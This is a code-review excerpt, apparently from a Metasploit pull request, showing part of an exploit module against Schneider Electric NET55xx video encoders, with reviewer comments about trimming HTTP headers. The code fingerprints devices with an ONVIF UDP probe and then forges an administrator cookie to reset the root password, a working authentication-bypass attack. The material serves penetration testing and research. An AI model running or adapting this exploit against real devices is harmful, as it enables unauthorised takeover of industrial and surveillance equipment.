modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb

```diff
@@ -0,0 +1,188 @@
+        Opt::RPORT(80),
+        OptString.new('USER_AGENT',  [ true,  "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]),
+        OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account']),
+        OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10])
+      ], self.class
+    )
+
+    register_advanced_options(
+      [
+        OptInt.new('UDP_PORT', [ true, 'UDP port for the ONVIF service', 3702]),
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+  end
+
+
+  def rhost
+    datastore['RHOST']
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def new_password
+    datastore['NEW_PASSWORD']
+  end
+
+
+  def check
+    xmlPayload = '<?xml version="1.0" encoding="UTF-8"?><Envelope xmlns="http://www.w3.org/2003/05/soap-envelope"><Header xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"><a:Action mustUnderstand="1">http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe</a:Action><a:MessageID>uuid:f3d577a3-431f-4450-ab45-b480042b9c74</a:MessageID><a:ReplyTo><a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><a:To mustUnderstand="1">urn:schemas-xmlsoap-org:ws:2005:04:discovery</a:To></Header><Body><Probe xmlns="http://schemas.xmlsoap.org/ws/2005/04/discovery"><Types xmlns:dp0="http://www.onvif.org/ver10/network/wsdl">dp0:NetworkVideoTransmitter</Types></Probe></Body></Envelope><?xml version="1.0" encoding="UTF-8"?>'
+    connect_udp(true, {'RPORT' => datastore['UDP_PORT']})
+    udp_sock.put(xmlPayload)
+    resp = []
+    resp << udp_sock.get(datastore['TIMEOUT'])
+    xmlResponse = resp.join(',')
+    disconnect_udp
+
+    if xmlResponse.include? "NET5501" or xmlResponse.include? "NET5501-I" or xmlResponse.include? "NET5501-XT" or xmlResponse.include? "NET5504" or xmlResponse.include? "NET5500" or xmlResponse.include? "NET5516" or xmlResponse.include? "NET5508"
+       return Exploit::CheckCode::Appears
+    end
+       return Exploit::CheckCode::Safe
+  end
+
+  def change_password
+    print_status("#{rhost}:80 - Attempt to change the root password...")
+    headers = {}
+    headers['Cookie'] = 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647'
+    headers['Content-Type'] = 'application/json;charset=utf-8'
+    headers['Connection'] = 'keep-alive'
+    headers['Accept'] = 'application/json, text/plain, */*'
+    headers['Accept-Language'] = 'en-US,en;q=0.5'
+    headers['Accept-Encoding'] = 'gzip, deflate, br'
+    headers['Cache-Control'] = 'no-cache'
+    headers['Pragma'] = 'no-cache'
+    headers['Content-Lenght'] = '47'
+    headers['Referer'] = normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh?timestamp=1544700034214')
+    headers['User-Agent'] = datastore['USER_AGENT']
```

Comment:
Are all of these headers required for a successful response?

Reply:
If any are required, please define them in the definition of `headers` for readability.

Reply:
Kept just Cookies and Content-type. Resolved at commit [4ee745e](https://github.com/rapid7/metasploit-framework/pull/12084/commits/4ee745e21edfd9699d04c8acec69fbfedd3b2020)